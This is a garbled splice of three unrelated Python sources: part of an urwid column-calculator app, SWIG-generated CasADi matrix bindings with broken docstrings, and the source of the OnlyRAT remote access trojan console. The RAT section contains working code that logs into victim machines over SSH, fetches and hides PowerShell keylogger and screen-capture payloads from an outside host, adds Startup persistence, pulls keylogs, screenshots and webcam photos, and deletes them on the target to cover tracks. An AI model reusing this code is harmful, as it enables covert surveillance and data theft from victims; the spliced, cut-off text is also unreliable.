            x = last_cell.get_result()
            if x is not None and focus_cell.op is not None:
                x = OPERATORS[focus_cell.op]( x,
                    focus_cell.get_value() )
        focus_cell.set_result(x)
        # Propagate downward; a missing operator poisons x (None) for the rest.
        # Stop early (result unchanged == False) as soon as a cell's stored
        # result already equals the recomputed value.
        for cell in self.content[i+1:]:
            if cell.op is None:
                x = None
            if x is not None:
                x = OPERATORS[cell.op]( x, cell.get_value() )
            if cell.get_result() == x:
                return False
            cell.set_result(x)
        return True
    def create_child( self, letter ):
        """Open a sub-expression column rooted at the focused cell.

        letter -- column letter to assign to the new child column

        Return (parent cell, child column) or (None, None) on failure.
        Raises CalcEvent if the focused cell already has a child or already
        contains typed digits (a sub-expression must start in an empty cell).
        """
        f, (i, sub) = self.walker.get_focus()
        if sub != 0:
            # f is not an edit widget
            return None, None
        cell = self.walker.get_cell(i)
        if cell.child is not None:
            raise CalcEvent, E_new_col_cell_not_empty
        if cell.edit.edit_text:
            raise CalcEvent, E_new_col_cell_not_empty
        child = CellColumn( letter )
        # Link the two: the cell now displays the child column's result.
        cell.become_parent( child, letter )
        return cell, child
def is_empty( self ):
"""Return True if this column is empty."""
return len(self.content)==1 and self.content[0].is_empty()
    def get_expression(self):
        """Return the column's expression as a printable string.

        Each cell contributes its operator (absent only on the first cell)
        followed by either its parenthesised child sub-expression or its
        integer value.
        """
        l = []
        for c in self.content:
            if c.op is not None: # only applies to first cell
                l.append(c.op)
            if c.child is not None:
                l.append("("+c.child.get_expression()+")")
            else:
                l.append("%d"%c.get_value())
        return "".join(l)
def get_result(self):
"""Return the result of the last cell in the column."""
return self.content[-1].get_result()
class HelpColumn(urwid.BoxWidget):
    """Scrollable help panel shown as the calculator's first column.

    Wraps the static help_text in a ListBox inside a Frame; a footer hint
    ("text continues...") is shown only while the bottom of the text is
    off-screen.
    """
    # Markup list: plain strings and ('attr', text) tuples per urwid.Text.
    help_text = [
        ('title', "Column Calculator"),
        "",
        [ "Numbers: ", ('key', "0"), "-", ('key', "9") ],
        "" ,
        [ "Operators: ",('key', "+"), ", ", ('key', "-"), ", ",
            ('key', "*"), " and ", ('key', "/")],
        "",
        [ "Editing: ", ('key', "BACKSPACE"), " and ",('key', "DELETE")],
        "",
        [ "Movement: ", ('key', "UP"), ", ", ('key', "DOWN"), ", ",
            ('key', "LEFT"), ", ", ('key', "RIGHT"), ", ",
            ('key', "PAGE UP"), " and ", ('key', "PAGE DOWN") ],
        "",
        [ "Sub-expressions: ", ('key', "("), " and ", ('key', ")") ],
        "",
        [ "Columns: ", ('key', COLUMN_KEYS[0]), " and ",
            ('key',COLUMN_KEYS[1]), "-",
            ('key',COLUMN_KEYS[-1]) ],
        "",
        [ "Exit: ", ('key', "Q") ],
        "",
        "",
        ["Column Calculator does operations in the order they are ",
            "typed, not by following usual precedence rules. ",
            "If you want to calculate ", ('key', "12 - 2 * 3"),
            " with the multiplication happening before the ",
            "subtraction you must type ",
            ('key', "12 - (2 * 3)"), " instead."],
        ]

    def __init__(self):
        # Header, scrollable body and the conditional footer hint.
        self.head = urwid.AttrWrap(
            urwid.Text(["Help Column ", ('key',"?")],
                layout = CALC_LAYOUT),
            'help')
        self.foot = urwid.AttrWrap(
            urwid.Text(["[text continues.. press ",
                ('key',"?"), " then scroll]"]), 'helpnote' )
        self.items = [urwid.Text(x) for x in self.help_text]
        self.listbox = urwid.ListBox(urwid.SimpleListWalker(self.items))
        self.body = urwid.AttrWrap( self.listbox, 'help' )
        self.frame = urwid.Frame( self.body, header=self.head)

    def render(self, size, focus=False):
        """Render the frame, toggling the footer based on scroll position."""
        maxcol, maxrow = size
        head_rows = self.head.rows((maxcol,))
        # Show the "text continues" footer only while the bottom is hidden.
        if "bottom" in self.listbox.ends_visible(
            (maxcol, maxrow-head_rows) ):
            self.frame.footer = None
        else:
            self.frame.footer = self.foot
        return self.frame.render( (maxcol, maxrow), focus)

    def keypress( self, size, key ):
        """Delegate all keys to the frame (scrolling the help text)."""
        return self.frame.keypress( size, key )
class CalcDisplay:
    """Top-level application object for the Column Calculator.

    Owns the urwid main loop, the help column plus the expression columns
    (self.col_list), and the parent/child links between sub-expression
    columns (self.col_link maps child column -> (parent cell, parent column)).
    """
    # (name, foreground, background[, monochrome/extended settings])
    palette = [
        ('body','white', 'dark blue'),
        ('edit','yellow', 'dark blue'),
        ('editfocus','yellow','dark cyan', 'bold'),
        ('key','dark cyan', 'light gray', ('standout','underline')),
        ('title', 'white', 'light gray', ('bold','standout')),
        ('help', 'black', 'light gray', 'standout'),
        ('helpnote', 'dark green', 'light gray'),
        ('colhead', 'black', 'light gray', 'standout'),
        ('event', 'light red', 'black', 'standout'),
        ('confirm', 'yellow', 'black', 'bold'),
        ]

    def __init__(self):
        # Column 0 is the help panel; column 1 ("A") is the root expression.
        self.columns = urwid.Columns([HelpColumn(), CellColumn("A")], 1)
        self.col_list = self.columns.widget_list
        self.columns.set_focus_column( 1 )
        view = urwid.AttrWrap(self.columns, 'body')
        self.view = urwid.Frame(view) # for showing messages
        self.col_link = {}

    def main(self):
        """Run the event loop; on exit print the expression and its result."""
        self.loop = urwid.MainLoop(self.view, self.palette, screen=Screen(),
            input_filter=self.input_filter)
        self.loop.run()

        # on exit write the formula and the result to the console
        expression, result = self.get_expression_result()
        print "Paste this expression into a new Column Calculator session to continue editing:"
        print expression
        print "Result:", result

    def input_filter(self, input, raw_input):
        """Consume all keyboard input, translating CalcEvents into footer
        messages. Always returns [] so MainLoop does no further processing."""
        if 'q' in input or 'Q' in input:
            raise urwid.ExitMainLoop()

        # handle other keystrokes
        for k in input:
            try:
                self.wrap_keypress(k)
                # Successful key: clear any previously displayed message.
                self.event = None
                self.view.footer = None
            except CalcEvent, e:
                # display any message
                self.event = e
                self.view.footer = e.widget()

        # remove all input from further processing by MainLoop
        return []

    def wrap_keypress(self, key):
        """Handle confirmation and throw event on bad input.

        Column deletion needs two consecutive delete events when the column
        is non-empty (the first raise acts as the confirmation prompt).
        """
        try:
            key = self.keypress(key)

        except ColumnDeleteEvent, e:
            if e.letter == COLUMN_KEYS[1]:
                # cannot delete the first column, ignore key
                return

            if not self.column_empty( e.letter ):
                # need to get two in a row, so check last event
                if not isinstance(self.event,ColumnDeleteEvent):
                    # ask for confirmation
                    raise e
            self.delete_column(e.letter)

        except UpdateParentEvent, e:
            self.update_parent_columns()
            return

        if key is None:
            return

        # Anything unhandled: report an error appropriate to the context.
        if self.columns.get_focus_column() == 0:
            if key not in ('up','down','page up','page down'):
                raise CalcEvent, E_invalid_in_help_col
        if key not in EDIT_KEYS and key not in MOVEMENT_KEYS:
            raise CalcEvent, E_invalid_key % key.upper()

    def keypress(self, key):
        """Handle a keystroke: column switching, '(' opens a child column,
        ')' returns to the parent. Returns the key if unhandled."""
        self.loop.process_input([key])

        if key.upper() in COLUMN_KEYS:
            # column switch
            i = COLUMN_KEYS.index(key.upper())
            if i >= len( self.col_list ):
                raise CalcEvent, E_no_such_column % key.upper()
            self.columns.set_focus_column( i )
            return
        elif key == "(":
            # open a new column
            if len( self.col_list ) >= len(COLUMN_KEYS):
                raise CalcEvent, E_no_more_columns
            i = self.columns.get_focus_column()
            if i == 0:
                # makes no sense in help column
                return key
            col = self.col_list[i]
            new_letter = COLUMN_KEYS[len(self.col_list)]
            parent, child = col.create_child( new_letter )
            if child is None:
                # something invalid in focus
                return key
            self.col_list.append(child)
            self.set_link( parent, col, child )
            self.columns.set_focus_column(len(self.col_list)-1)

        elif key == ")":
            i = self.columns.get_focus_column()
            if i == 0:
                # makes no sense in help column
                return key
            col = self.col_list[i]
            parent, pcol = self.get_parent( col )
            if parent is None:
                # column has no parent
                raise CalcEvent, E_no_parent_column
            new_i = self.col_list.index( pcol )
            self.columns.set_focus_column( new_i )
        else:
            return key

    def set_link( self, parent, pcol, child ):
        """Store the link between a parent cell and child column.

        parent -- parent Cell object
        pcol -- CellColumn where parent resides
        child -- child CellColumn object"""
        self.col_link[ child ] = parent, pcol

    def get_parent( self, child ):
        """Return the parent and parent column for a given column."""
        return self.col_link.get( child, (None,None) )

    def column_empty(self, letter):
        """Return True if the column passed is empty."""
        i = COLUMN_KEYS.index(letter)
        col = self.col_list[i]
        return col.is_empty()

    def delete_column(self, letter):
        """Delete the column with the given letter.

        Also removes (recursively, via the membership test against
        remove_cols) every column that descends from it, then re-letters the
        surviving columns to keep letters contiguous.
        """
        i = COLUMN_KEYS.index(letter)
        col = self.col_list[i]

        parent, pcol = self.get_parent( col )

        f = self.columns.get_focus_column()
        if f == i:
            # move focus to the parent column
            f = self.col_list.index(pcol)
            self.columns.set_focus_column(f)

        parent.remove_child()
        pcol.update_results(parent)
        del self.col_list[i]

        # delete children of this column
        keep_right_cols = []
        remove_cols = [col]
        for rcol in self.col_list[i:]:
            parent, pcol = self.get_parent( rcol )
            if pcol in remove_cols:
                remove_cols.append( rcol )
            else:
                keep_right_cols.append( rcol )
        for rc in remove_cols:
            # remove the links
            del self.col_link[rc]
        # keep only the non-children
        self.col_list[i:] = keep_right_cols

        # fix the letter assignments
        for j in range(i, len(self.col_list)):
            col = self.col_list[j]
            # fix the column heading
            col.set_letter( COLUMN_KEYS[j] )
            parent, pcol = self.get_parent( col )
            # fix the parent cell
            parent.edit.set_letter( COLUMN_KEYS[j] )

    def update_parent_columns(self):
        "Update the parent columns of the current focus column."
        f = self.columns.get_focus_column()
        col = self.col_list[f]
        while 1:
            parent, pcol = self.get_parent(col)
            if pcol is None:
                return

            changed = pcol.update_results( start_from = parent )
            if not changed:
                # result unchanged: no need to propagate further up
                return
            col = pcol

    def get_expression_result(self):
        """Return (expression, result) as strings."""
        col = self.col_list[1]
        return col.get_expression(), "%d"%col.get_result()
class CalcNumLayout(urwid.TextLayout):
"""
TextLayout class for bottom-right aligned numbers with a space on
the last line for the cursor.
"""
def layout( self, text, width, align, wrap ):
"""
Return layout structure for calculator number display.
"""
lt = len(text) + 1 # extra space for cursor
r = (lt) % width # remaining segment not full width wide
linestarts = range( r, lt, width )
l = []
if linestarts:
if r:
# right-align the | |
ncol, int p) -> [SX]
Create a vector of length p with nrow-by-ncol symbolic primitives.
sym(str name, Sparsity sp, int p, int r) -> [[SX]]
Create a vector of length r of vectors of length p with symbolic primitives
sym(str name, int nrow, int ncol, int p, int r) -> [[SX]]
symbolic primitives.
> sym(str name, (int,int) rc)
------------------------------------------------------------------------
Construct a symbolic primitive with given dimensions.
> sym(str name, int nrow, int ncol, int p)
------------------------------------------------------------------------
Create a vector of length p with nrow-by-ncol symbolic primitives.
> sym(str name, Sparsity sp, int p, int r)
------------------------------------------------------------------------
Create a vector of length r of vectors of length p with symbolic primitives
with given sparsity.
> sym(str name, int nrow, int ncol, int p, int r)
------------------------------------------------------------------------
Create a vector of length r of vectors of length p with nrow-by-ncol
symbolic primitives.
> sym(str name, Sparsity sp)
------------------------------------------------------------------------
Create symbolic primitive with a given sparsity pattern.
> sym(str name, int nrow, int ncol)
------------------------------------------------------------------------
Create an nrow-by-ncol symbolic primitive.
> sym(str name, Sparsity sp, int p)
------------------------------------------------------------------------
Create a vector of length p with with matrices with symbolic primitives of
given sparsity.
"""
return _casadi.GenSX_sym(*args)
sym = staticmethod(sym)
    def zeros(*args):
        """
        zeros(int nrow, int ncol) -> SX
        zeros((int,int) rc) -> SX
        zeros(Sparsity sp) -> SX

        Create a dense matrix or a matrix with specified sparsity with all
        entries zero.
        """
        return _casadi.GenSX_zeros(*args)
    zeros = staticmethod(zeros)
    def ones(*args):
        """
        ones(int nrow, int ncol) -> SX
        ones((int,int) rc) -> SX
        ones(Sparsity sp) -> SX

        Create a dense matrix or a matrix with specified sparsity with all
        entries one.
        """
        return _casadi.GenSX_ones(*args)
    ones = staticmethod(ones)
    def __init__(self, *args):
        """
        GenSX()
        GenSX(GenSX other)

        Default- or copy-construct a GenSX proxy object.
        """
        this = _casadi.new_GenSX(*args)
        # Standard SWIG ownership idiom: attach the new C++ object to an
        # existing proxy when possible, otherwise take ownership directly.
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
__swig_destroy__ = _casadi.delete_GenSX
GenSX_swigregister = _casadi.GenSX_swigregister
GenSX_swigregister(GenSX)
def GenSX_sym(*args):
    """
    sym(str name, int nrow, int ncol) -> SX
        Create an nrow-by-ncol symbolic primitive.
    sym(str name, (int,int) rc) -> SX
        Construct a symbolic primitive with given dimensions.
    sym(str name, Sparsity sp) -> SX
        Create a symbolic primitive with a given sparsity pattern.
    sym(str name, Sparsity sp, int p) -> [SX]
        Create a vector of length p of matrices with symbolic primitives of
        given sparsity.
    sym(str name, int nrow, int ncol, int p) -> [SX]
        Create a vector of length p with nrow-by-ncol symbolic primitives.
    sym(str name, Sparsity sp, int p, int r) -> [[SX]]
        Create a vector of length r of vectors of length p with symbolic
        primitives with given sparsity.
    sym(str name, int nrow, int ncol, int p, int r) -> [[SX]]
        Create a vector of length r of vectors of length p with nrow-by-ncol
        symbolic primitives.
    """
    return _casadi.GenSX_sym(*args)
def GenSX_zeros(*args):
    """
    zeros(int nrow, int ncol) -> SX
    zeros((int,int) rc) -> SX
    zeros(Sparsity sp) -> SX

    Create a dense matrix or a matrix with specified sparsity with all
    entries zero.
    """
    return _casadi.GenSX_zeros(*args)
def GenSX_ones(*args):
    """
    ones(int nrow, int ncol) -> SX
    ones((int,int) rc) -> SX
    ones(Sparsity sp) -> SX

    Create a dense matrix or a matrix with specified sparsity with all
    entries one.
    """
    return _casadi.GenSX_ones(*args)
class GenMX(GenericMatrixCommon, SparsityInterfaceCommon):
    """
    SWIG proxy class exposing the generic matrix API (dimensions, sparsity
    queries, symbolic construction) for the MX matrix type.
    """
    # Merge the SWIG attribute-dispatch tables of both base proxy classes,
    # then route attribute access through the SWIG runtime helpers.
    __swig_setmethods__ = {}
    for _s in [GenericMatrixCommon, SparsityInterfaceCommon]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, GenMX, name, value)
    __swig_getmethods__ = {}
    for _s in [GenericMatrixCommon, SparsityInterfaceCommon]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, GenMX, name)
    __repr__ = _swig_repr
    def nnz(self, *args):
        """
        nnz(self) -> int

        Get the number of (structural) non-zero elements.
        """
        return _casadi.GenMX_nnz(self, *args)
    def nnz_lower(self, *args):
        """
        nnz_lower(self) -> int

        Get the number of non-zeros in the lower triangular half.
        """
        return _casadi.GenMX_nnz_lower(self, *args)
    def nnz_upper(self, *args):
        """
        nnz_upper(self) -> int

        Get the number of non-zeros in the upper triangular half.
        """
        return _casadi.GenMX_nnz_upper(self, *args)
    def nnz_diag(self, *args):
        """
        nnz_diag(self) -> int

        Get the number of non-zeros on the diagonal.
        """
        return _casadi.GenMX_nnz_diag(self, *args)
    def numel(self, *args):
        """
        numel(self) -> int

        Get the number of elements.
        """
        return _casadi.GenMX_numel(self, *args)
    def size1(self, *args):
        """
        size1(self) -> int

        Get the first dimension (i.e. number of rows).
        """
        return _casadi.GenMX_size1(self, *args)
    def rows(self, *args):
        """
        rows(self) -> int

        Get the number of rows, Octave-style syntax.
        """
        return _casadi.GenMX_rows(self, *args)
    def size2(self, *args):
        """
        size2(self) -> int

        Get the second dimension (i.e. number of columns).
        """
        return _casadi.GenMX_size2(self, *args)
    def columns(self, *args):
        """
        columns(self) -> int

        Get the number of columns, Octave-style syntax.
        """
        return _casadi.GenMX_columns(self, *args)
    def dim(self, *args):
        """
        dim(self, bool with_nz) -> str

        Get string representation of dimensions. The representation is e.g.
        "4x5" or "4x5,10nz".
        """
        return _casadi.GenMX_dim(self, *args)
    def size(self, *args):
        """
        size(self) -> (int,int)
        size(self, int axis) -> int

        > size(self)
            Get the shape.
        > size(self, int axis)
            Get the size along a particular dimension.
        """
        return _casadi.GenMX_size(self, *args)
    def is_empty(self, *args):
        """
        is_empty(self, bool both) -> bool

        Check if the sparsity is empty, i.e. if one of the dimensions is zero
        (or optionally both dimensions).
        """
        return _casadi.GenMX_is_empty(self, *args)
    def is_dense(self, *args):
        """
        is_dense(self) -> bool

        Check if the matrix expression is dense.
        """
        return _casadi.GenMX_is_dense(self, *args)
    def is_scalar(self, *args):
        """
        is_scalar(self, bool scalar_and_dense) -> bool

        Check if the matrix expression is scalar.
        """
        return _casadi.GenMX_is_scalar(self, *args)
    def is_square(self, *args):
        """
        is_square(self) -> bool

        Check if the matrix expression is square.
        """
        return _casadi.GenMX_is_square(self, *args)
    def is_vector(self, *args):
        """
        is_vector(self) -> bool

        Check if the matrix is a row or column vector.
        """
        return _casadi.GenMX_is_vector(self, *args)
    def is_row(self, *args):
        """
        is_row(self) -> bool

        Check if the matrix is a row vector (i.e. size1()==1).
        """
        return _casadi.GenMX_is_row(self, *args)
    def is_column(self, *args):
        """
        is_column(self) -> bool

        Check if the matrix is a column vector (i.e. size2()==1).
        """
        return _casadi.GenMX_is_column(self, *args)
    def is_triu(self, *args):
        """
        is_triu(self) -> bool

        Check if the matrix is upper triangular.
        """
        return _casadi.GenMX_is_triu(self, *args)
    def is_tril(self, *args):
        """
        is_tril(self) -> bool

        Check if the matrix is lower triangular.
        """
        return _casadi.GenMX_is_tril(self, *args)
    def row(self, *args):
        """
        row(self) -> [int]
        row(self, int el) -> int

        Get the sparsity pattern. See the Sparsity class for details.
        """
        return _casadi.GenMX_row(self, *args)
    def colind(self, *args):
        """
        colind(self) -> [int]
        colind(self, int col) -> int

        Get the sparsity pattern. See the Sparsity class for details.
        """
        return _casadi.GenMX_colind(self, *args)
    def sparsity(self, *args):
        """
        sparsity(self) -> Sparsity

        Get the sparsity pattern.
        """
        return _casadi.GenMX_sparsity(self, *args)
def sym(*args):
"""
Create a vector of length r of vectors of length p with nrow-by-ncol
sym(str name, int nrow, int ncol) -> MX
Create an nrow-by-ncol symbolic primitive.
sym(str name, (int,int) rc) -> MX
Construct a symbolic primitive with given dimensions.
sym(str name, Sparsity sp) -> MX
Create symbolic primitive with a given sparsity pattern.
sym(str name, Sparsity sp, int p) -> [MX]
Create a vector of length p with with matrices with symbolic primitives of
sym(str name, int nrow, int ncol, int p) -> [MX]
Create a vector of length p with nrow-by-ncol symbolic primitives.
sym(str name, Sparsity sp, int p, int r) -> [[MX]]
Create | |
#!/usr/bin/python
# python console for OnlyRAT
# created by : C0SM0
# imports
import os
import sys
import getpass
import random as r
from datetime import datetime
# banner for display
banner = """
_;,
,,=-,--,,__ _,-;:;;},,,_
_,oo, Ll _,##&&&&$$&&$$$&-=;%%^%&;v:&& @ `=,_
,oO" `0} Ll ,%#####&#>&&$$$$&$$$&,&'$$#`"%%;,,,*%^<}
_,--O;_, 0_ Ll ,%%%%%&%-#&###$$"$$$$$*;&&$,#;%^*%$$^{,%;'
,cC'oO`'CC ,OnnNNNNn, Ll YY, ,%#&%%$$$$%%%%%##&&^$%^%&&&$$'&#,-%%--"'
,CCCO" `C ,0`Nn` `Nn Ll YY, ,;;##&,$$$$$$$;,%%%&&%%%&&&&&&$$%%'
{CC{ ,0' NN NN Ll Yy yY';#&,#,$$$$$%%%%%%%%&%%%&&&&&&%%`
CCC( _o0 NN NN Ll YyyY ,;&##&###%%$$%&&%%%%#^%^&&&&&%{`
,OCC{ ,0C NN NN Ll YY ;#&&#####&%;%&&,%%%%#%=%%%&^%%
,O`'"Cc_.o0cC NN NN Ll y, YY ;&&&^##&&&$%&&&%%%"` `%%%%
o0 _o0"` '` NN NN Ll Yy,yYY '^%%&VGh%%%%%&&"^%_,, "%%%,_ _,.,_
0o,_,oo0" NN NN Ll `YyY` ``'"lIG9ubHkg,,""''` ""%%>_,;VyIG5lZ;,
"00O"` ``'``""UkFUIHlvdSdsbCBldm;" `"WQ=,
"""
# _..----.._ _
# .' .--. "-.(0)_
# '-.__.-'"'=:| , _)_ \\__ . c\\'-..
# '''------'---''---'-"
# :::::::: :::: ::: ::: ::: ::: ::::::::: ::: :::::::::::
# :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
# +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
# +#+ +:+ +#+ +:+ +#+ +#+ +#++: +#++:++#: +#++:++#++: +#+
# +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ +#+
# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
# ######## ### #### ########## ### ### ### ### ### ###
# [::] The Only RAT You'll Ever Need [::]
# [::] Created By : Blue Cosmo [::]
# help menu
help_menu = """
[+] Arguments:
<username>.rat = configuration file
[+] Example:
onlyrat bluecosmo.rat
"""
# option menu
options_menu = """
[+] Command and Control:
[orconsole] ------ Remote Console
[fix orconsole] -- Fix Remote Console
[upload] --------- Upload File
[downlaod] ------- Download File
[restart] -------- Restart Target PC
[shutdown] ------- Shutdown Target PC
[killswitch] ----- Removes OnlyRAT From Target
[+] Reconnaissance:
[install keylogger] ------ Install Keylogger
[install screencapture] -- Install ScreenCapture
[install webcam] --------- Install WebCam Capture
[grab keylogs] ----------- Grab Keylogs
[grab screenshots] ------- Grab ScreenShots From ScreenCapture
[grab webcam] ------------ Grab WebCam Photos
[+] Options:
[help] ------- Help Menu
[man] -------- Onlyrat Manual
[config] ----- Display RAT File
[version] ---- Version Number
[update] ----- Update OnlyRAT
[uninstall] -- Uninstall OnlyRAT
[quit] ------- Quit
* any other commands will be
sent through your terminal
[*] Select an [option]...
"""
username = getpass.getuser() # gets username
header = f"[~] {username}@onlyrat $ " # sets up user input interface
remote_path = "raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main" # url path for OnlyRAT files
local_path = f"/home/{username}/.OnlyRAT" if username != "root" else "/root/.OnlyRAT" # gets path of OnlyRAT
# random text generator for obfuscation
def random_text():
lower_case = "abcdefghijklmnopqrstuvwxyz"
upper_case = "abcdefghijklmnopqrstuvwxyz".upper()
characters = lower_case + upper_case
generated_text = ""
for i in range(10):
generated_text += r.choice(list(characters))
return generated_text
# read config file
def read_config(config_file):
configuration = {}
# get file contents
read_lines = open(config_file, "r").readlines()
# get target configurations
configuration["IPADDRESS"] = read_lines[0].strip()
configuration["PASSWORD"] = read_lines[1].strip()
configuration["WORKINGDIRECTORY"] = (read_lines[2]).replace("\\", "/").strip()
configuration["STARTUPDIRECTORY"] = (read_lines[3]).replace("\\", "/").strip()
return configuration
# display configuration file data
def print_config(configuration):
for key, value in configuration.items():
print(f"{key} : {value}")
# clear screen
def clear():
os.system("clear")
# terminates program
def exit():
print("\n[*] Exiting...")
sys.exit()
# gets current date and time
def current_date():
current = datetime.now()
return current.strftime("%m-%d-%Y_%H-%M-%S")
# connects rat to target
def connect(address, password):
print("\n [*] Connecting to target...")
# remotely connect
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address}")
# remote uploads with SCP
def remote_upload(address, password, upload, path):
print("\n[*] Starting Upload...")
# scp upload
os.system(f"sshpass -p \"{password}\" scp {upload} onlyrat@{address}:{path}")
print("[+] Upload complete\n")
# remote download with SCP
def remote_download(address, password, path):
print("\n[*] Starting Download...")
# scp download
os.system("mkdir ~/Downloads")
os.system(f"sshpass -p \"{password}\" scp -r onlyrat@{address}:{path} ~/Downloads")
print("[+] Download saved to \"~/Downloads\"\n")
# run commands remotely with SCP
def remote_command(address, password, command):
# remote command execution
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address} '{command}'")
# keylogger
def keylogger(address, password, username, working):
print("\n[*] Prepping keylogger...")
# web requests
keylogger_command = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/keylogger.ps1 -OutFile {working}/KHRgMHYmdT.ps1\""
controller_command = f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/KHRgMHYmdT.ps1 >> GiLqXiexKP.cmd"
print("[+] Keylogger prepped")
# installing keylogger
print("[*] Installing keylogger...")
remote_command(address, password, keylogger_command)
print("[*] Installing controller...")
remote_command(address, password, controller_command)
print("[+] Keylogger installed sucessfully\n")
# execute logger
print("\n[!] Restart target computer to execute")
# takes screenshots off of target
def grab_screenshots(address, password, working, username):
# download screenshot
print("\n[*] Downloading screenshots...")
screenshot_location = f"{working}/amETlOMhPo"
remote_download(address, password, screenshot_location)
print("[+] Screenshots downloaded")
# formatting screenshots
print("[*] Fromatting screenshots...")
loot_folder = f"screenshots-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/amETlOMhPo")
print("[+] Screenshots formatted")
# deletes screenshots off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/amETlOMhPo/*"
remote_command(address, password, delete_screenshots)
print("[+] Screenshots downloaded")
# confirmation
print("\n[+] Screenshots downloaded to \"~/Downloads\"\n")
# takes webcam pictures off of target
def grab_webcam(address, password, working, username):
# download webcam photos
print("\n[*] Downloading webcam photos...")
screenshot_location = f"{working}/bNOEXCxyVp"
remote_download(address, password, screenshot_location)
print("[+] Photos downloaded")
# formatting webcam photos
print("[*] Fromatting photos...")
loot_folder = f"webcam-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/bNOEXCxyVp")
print("[+] Photos formatted")
# deletes photos off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/bNOEXCxyVp/*.bmp"
remote_command(address, password, delete_screenshots)
print("[+] Photos downloaded")
# confirmation
print("\n[+] Photos downloaded to \"~/Downloads\"\n")
# killswitch
def killswitch(address, password, working, username):
print("\n[*] Prepping killswitch...")
# web requests
killswitch_command = f"powershell /c cd C:; Remove-Item {working}/* -r -Force; Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Remove-Item \"C:/Users/onlyrat\" -r -Force; Remove-LocalUser -Name \"onlyrat\"; shutdown /r"
print("[+] Killswitch prepped")
# installing killswitch
print("[*] Executing killswitch...")
remote_command(address, password, f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && del GiLqXiexKP.cmd")
remote_command(address, password, killswitch_command)
print("[+] Killswitch Executed sucessfully\n")
# execute logger
print("\n[*] Restarting target computer...")
# custom upload
def upload(address, password, working):
# get upload file
print("\n[~] Enter file you wish to upload :")
upload_file = input(header)
# upload file
print("\n[*] Uploading...")
remote_upload(address, password, upload_file, working)
print(f"[+] Uploaded sucessfully to \"{working}\"\n")
# custom download
def download(address, password):
# get download path
print("\n[~] Enter path of file you wish to download :")
download_file = input(header)
# download file
print("\n[*] Downloading...")
remote_download(address, password, download_file)
# update OnlyRAT
def update():
print("\n[*] Checking for updates...")
# get latest version nubmer
os.system(f"curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt")
# save version nubmers to memory
current_version = float(open(f"{local_path}/version.txt", "r").read())
latest_version = float(open(f"{local_path}/latest.txt", "r").read())
# remove version number file
os.system("rm -rf ~/.OnlyRAT/latest.txt")
# if new version is available, update
if latest_version > current_version:
print("\n[+] Update found")
print("[~] Update Onlyrat? [y/n]\n")
# user input, option
option = input(f"{header}")
# update
if option == "y":
os.system(f"sh ~/.OnlyRAT/payloads/update.sh")
# exception
else:
main()
# otherwise, run main code
else:
print("\n[+] OnlyRAT already up to date")
print("[*] Hit any key to continue...\n")
input(header)
main()
# uninstalls onlyrat
def remove():
# confirmation
print("\n[~] Are you sure you want to remove OnlyRAT [y/n]\n")
# user input
option = input(header)
# delete OnlyRAT
if option == "y":
os.system("rm -rf ~/.OnlyRAT")
# cancel
if option == "n":
main()
# listener
def listener():
pass
# command line interface
def cli(arguments):
# display banner
clear()
# listener
# if sys.argv[1] == "listener":
# listener()
print(banner)
# if arguments exist
if arguments:
print("\t[~] Type \"help\" for help menu :\n")
# loop user input
while True:
# user input, option
option = input(header)
# check if configuration file exists
try:
configuration = read_config(sys.argv[1])
except FileNotFoundError:
print("\n[!!] File does not exist")
exit()
# get config info
ipv4 = configuration.get("IPADDRESS")
password = configuration.get("PASSWORD")
working_direcory = configuration.get("WORKINGDIRECTORY")
startup_direcory = configuration.get("STARTUPDIRECTORY")
target_username = working_direcory[9:-19]
# remote console
if option == "orconsole":
connect(ipv4, password)
# fix remote console
if option == "fix orconsole":
os.system(f"sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}")
# keylogger option
elif option == "install keylogger":
keylogger(ipv4, password, target_username, working_direcory)
# grab keylogs option
elif option == "grab keylogs":
remote_download(ipv4, password, f"{working_direcory}/{target_username}.log")
remote_command(ipv4, password, f"powershell New-Item -Path {working_direcory}/{target_username}.log -ItemType File -Force")
print("[+] Log file saved to \"~/Downloads\"")
print("[+] Log file on target has been wiped\n")
# installs screen capture option
elif option == "install screencapture":
print("\n[*] Installing screen capture...")
install_screencaputre = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/screenshot.ps1 -OutFile {working_direcory}/SbQRViPjIq.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/SbQRViPjIq.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_screencaputre)
